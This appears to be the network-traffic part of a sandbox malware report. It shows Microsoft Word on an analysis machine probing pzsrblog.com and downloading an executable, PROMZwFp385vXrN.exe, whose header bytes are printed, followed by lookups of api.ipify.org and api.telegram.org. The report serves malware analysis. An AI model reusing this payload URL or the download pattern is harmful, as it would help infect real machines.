Dec 20, 2022 14:15:38.468616962 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.468658924 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.468674898 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.471595049 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.471615076 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.471688986 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.471700907 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.471718073 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.471740961 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.472358942 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.472378969 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.472428083 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.472434998 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.472469091 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.472484112 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.474203110 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.474248886 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.474284887 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.474296093 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.474329948 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.474347115 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.475246906 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.475271940 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.475330114 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.475342035 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.475366116 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.475383997 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.476376057 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.476397991 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.476452112 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.476464033 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.476492882 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.476511002 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.477566957 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.477588892 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.477664948 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.477675915 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.477704048 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.477720022 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.478241920 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.478262901 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.478308916 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.478317022 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.478348970 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.478369951 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.479556084 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.479576111 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.479635954 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.479645967 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.479684114 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.479701996 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.480217934 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.480238914 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.480290890 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.480298996 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.480331898 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.480351925 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.480784893 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.480807066 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.480859995 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.480870008 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.480916023 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.480931997 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.481498003 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.481519938 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.481609106 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.481618881 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.481663942 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.481781960 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.481811047 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.481862068 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.481869936 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.481898069 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.481919050 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.482297897 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.482319117 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.482376099 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.482383013 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.482424974 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.482450008 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.482709885 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.482733965 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.482781887 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.482789040 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.482827902 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.482851028 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.483084917 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.483105898 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.483155966 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.483165979 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.483201981 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.483222008 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.483581066 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.483601093 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.483645916 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.483654022 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.483696938 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.483715057 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.483946085 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.483967066 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.484009027 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.484015942 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.484054089 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.484076977 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.484565973 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.484586000 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.484658957 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.484669924 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.484709978 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.484729052 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.484903097 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.484921932 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.484976053 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.484982967 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.485023022 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.485042095 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.485270023 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.485291004 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.485340118 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.485347033 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.485383987 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.485404968 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.485424995 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.485488892 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.485497952 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.485522032 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.485541105 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.485569954 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.503065109 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.503097057 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:16:29.107270956 CET	49724	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:29.107336044 CET	443	49724	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:29.107434988 CET	49724	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:29.150238037 CET	49724	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:29.150278091 CET	443	49724	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:29.595961094 CET	443	49724	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:29.596060991 CET	49724	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:29.599344015 CET	49724	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:29.599364042 CET	443	49724	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:29.599694967 CET	443	49724	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:29.755517006 CET	49724	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:30.192749023 CET	49724	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:30.192804098 CET	443	49724	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:30.332299948 CET	443	49724	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:30.332429886 CET	443	49724	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:30.332571030 CET	49724	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:30.342643023 CET	49724	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:50.349970102 CET	49727	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:50.350014925 CET	443	49727	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:50.350116014 CET	49727	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:50.354089022 CET	49727	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:50.354108095 CET	443	49727	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:50.642107010 CET	443	49727	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:50.642225981 CET	49727	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:50.644149065 CET	49727	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:50.644172907 CET	443	49727	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:50.644531965 CET	443	49727	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:50.667761087 CET	49727	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:50.667802095 CET	443	49727	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:50.958728075 CET	443	49727	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:50.958861113 CET	443	49727	64.185.227.156	192.168.2.5
Dec 20, 2022 14:16:50.958945036 CET	49727	443	192.168.2.5	64.185.227.156
Dec 20, 2022 14:16:50.959795952 CET	49727	443	192.168.2.5	64.185.227.156

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2022 14:14:23.832971096 CET	51441	53	192.168.2.5	8.8.8.8
Dec 20, 2022 14:14:23.852786064 CET	53	51441	8.8.8.8	192.168.2.5
Dec 20, 2022 14:14:30.619604111 CET	49724	53	192.168.2.5	8.8.8.8
Dec 20, 2022 14:14:30.637578964 CET	53	49724	8.8.8.8	192.168.2.5
Dec 20, 2022 14:15:35.389008045 CET	55039	53	192.168.2.5	8.8.8.8
Dec 20, 2022 14:15:35.406678915 CET	53	55039	8.8.8.8	192.168.2.5
Dec 20, 2022 14:16:28.995455027 CET	62659	53	192.168.2.5	8.8.8.8
Dec 20, 2022 14:16:29.014905930 CET	53	62659	8.8.8.8	192.168.2.5
Dec 20, 2022 14:16:29.046013117 CET	58581	53	192.168.2.5	8.8.8.8
Dec 20, 2022 14:16:29.065974951 CET	53	58581	8.8.8.8	192.168.2.5
Dec 20, 2022 14:16:47.428745031 CET	56263	53	192.168.2.5	8.8.8.8
Dec 20, 2022 14:16:47.446058989 CET	53	56263	8.8.8.8	192.168.2.5
Dec 20, 2022 14:16:50.307109118 CET	56687	53	192.168.2.5	8.8.8.8
Dec 20, 2022 14:16:50.326646090 CET	53	56687	8.8.8.8	192.168.2.5
Dec 20, 2022 14:16:50.329607010 CET	64419	53	192.168.2.5	8.8.8.8
Dec 20, 2022 14:16:50.346931934 CET	53	64419	8.8.8.8	192.168.2.5
Dec 20, 2022 14:16:51.833882093 CET	52688	53	192.168.2.5	8.8.8.8
Dec 20, 2022 14:16:51.851346016 CET	53	52688	8.8.8.8	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 20, 2022 14:14:21.227132082 CET	192.168.2.5	8.8.8.8	d07a	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 20, 2022 14:14:23.832971096 CET	192.168.2.5	8.8.8.8	0x9fc	Standard query (0)	pzsrblog.com	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:14:30.619604111 CET	192.168.2.5	8.8.8.8	0x3efd	Standard query (0)	pzsrblog.com	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:15:35.389008045 CET	192.168.2.5	8.8.8.8	0xd4ea	Standard query (0)	pzsrblog.com	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:28.995455027 CET	192.168.2.5	8.8.8.8	0xd9e5	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:29.046013117 CET	192.168.2.5	8.8.8.8	0xb93a	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:47.428745031 CET	192.168.2.5	8.8.8.8	0x198	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:50.307109118 CET	192.168.2.5	8.8.8.8	0x2526	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:50.329607010 CET	192.168.2.5	8.8.8.8	0xf341	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:51.833882093 CET	192.168.2.5	8.8.8.8	0xa1a0	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 20, 2022 14:14:23.852786064 CET	8.8.8.8	192.168.2.5	0x9fc	No error (0)	pzsrblog.com		118.27.125.229	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:14:30.637578964 CET	8.8.8.8	192.168.2.5	0x3efd	No error (0)	pzsrblog.com		118.27.125.229	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:15:35.406678915 CET	8.8.8.8	192.168.2.5	0xd4ea	No error (0)	pzsrblog.com		118.27.125.229	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:29.014905930 CET	8.8.8.8	192.168.2.5	0xd9e5	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2022 14:16:29.014905930 CET	8.8.8.8	192.168.2.5	0xd9e5	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:29.014905930 CET	8.8.8.8	192.168.2.5	0xd9e5	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:29.014905930 CET	8.8.8.8	192.168.2.5	0xd9e5	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:29.065974951 CET	8.8.8.8	192.168.2.5	0xb93a	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2022 14:16:29.065974951 CET	8.8.8.8	192.168.2.5	0xb93a	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:29.065974951 CET	8.8.8.8	192.168.2.5	0xb93a	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:29.065974951 CET	8.8.8.8	192.168.2.5	0xb93a	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:47.446058989 CET	8.8.8.8	192.168.2.5	0x198	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:50.326646090 CET	8.8.8.8	192.168.2.5	0x2526	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2022 14:16:50.326646090 CET	8.8.8.8	192.168.2.5	0x2526	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:50.326646090 CET	8.8.8.8	192.168.2.5	0x2526	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:50.326646090 CET	8.8.8.8	192.168.2.5	0x2526	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:50.346931934 CET	8.8.8.8	192.168.2.5	0xf341	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2022 14:16:50.346931934 CET	8.8.8.8	192.168.2.5	0xf341	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:50.346931934 CET	8.8.8.8	192.168.2.5	0xf341	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:50.346931934 CET	8.8.8.8	192.168.2.5	0xf341	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Dec 20, 2022 14:16:51.851346016 CET	8.8.8.8	192.168.2.5	0xa1a0	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pzsrblog.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49701	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	Direction	Data
2022-12-20 13:14:24 UTC	OUT	OPTIONS /wp-content/uploads/2012/ HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: pzsrblog.com
2022-12-20 13:14:25 UTC	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Dec 2022 13:14:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 19268 Connection: close Server: LiteSpeed last-modified: Tue, 25 Jan 2022 07:44:20 GMT etag: "4b44-61efaa54-78a64b804597b561;;;" accept-ranges: bytes x-turbo-charged-by: LiteSpeed
2022-12-20 13:14:25 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49702	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:14:25 UTC	1	OUT	HEAD /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t Host: pzsrblog.com
2022-12-20 13:14:26 UTC	1	IN	HTTP/1.1 200 OK Date: Tue, 20 Dec 2022 13:14:26 GMT Content-Length: 8032 Connection: close Server: LiteSpeed cache-control: public, max-age=1 expires: Tue, 20 Dec 2022 13:14:27 GMT last-modified: Tue, 20 Dec 2022 05:25:57 GMT accept-ranges: bytes vary: Accept-Encoding x-turbo-charged-by: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49711	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:14:39 UTC	17	OUT	GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: pzsrblog.com If-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMT Connection: Keep-Alive
2022-12-20 13:14:40 UTC	17	IN	HTTP/1.1 304 Not Modified Date: Tue, 20 Dec 2022 13:14:40 GMT Connection: close Server: LiteSpeed cache-control: public, max-age=1 expires: Tue, 20 Dec 2022 13:14:41 GMT vary: Accept-Encoding x-turbo-charged-by: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49712	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:14:43 UTC	18	OUT	HEAD /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: pzsrblog.com Connection: Keep-Alive
2022-12-20 13:14:44 UTC	18	IN	HTTP/1.1 200 OK Date: Tue, 20 Dec 2022 13:14:43 GMT Content-Length: 8032 Connection: close Server: LiteSpeed cache-control: public, max-age=1 expires: Tue, 20 Dec 2022 13:14:44 GMT last-modified: Tue, 20 Dec 2022 05:25:57 GMT accept-ranges: bytes vary: Accept-Encoding x-turbo-charged-by: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49718	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:15:36 UTC	18	OUT	GET /wp-content/uploads/2012/PROMZwFp385vXrN.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: pzsrblog.com Connection: Keep-Alive
2022-12-20 13:15:36 UTC	18	IN	HTTP/1.1 200 OK Date: Tue, 20 Dec 2022 13:15:36 GMT Content-Type: application/x-executable Content-Length: 1187840 Connection: close Server: LiteSpeed cache-control: public, max-age=1 expires: Tue, 20 Dec 2022 13:15:37 GMT last-modified: Tue, 20 Dec 2022 05:22:05 GMT accept-ranges: bytes vary: Accept-Encoding x-turbo-charged-by: LiteSpeed
2022-12-20 13:15:36 UTC	19	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9e 20 a1 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 50 00 00 08 12 00 00 16 00 00 00 00 00 00 8e 27 12 00 00 20 00 00 00 40 12 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 12 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL cP' @@ @
